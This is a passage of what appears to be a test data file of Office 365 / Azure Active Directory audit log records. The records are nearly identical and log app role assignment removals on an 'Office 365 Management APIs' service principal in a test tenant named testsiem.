"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372052"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "115f72b6-e8e6-4710-98e9-63ccd20bf2ec"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372061"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "02868191-019a-453a-a3a9-a21f44898778"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372052"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "115f72b6-e8e6-4710-98e9-63ccd20bf2ec"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372052"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "115f72b6-e8e6-4710-98e9-63ccd20bf2ec"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372061"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "02868191-019a-453a-a3a9-a21f44898778"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": 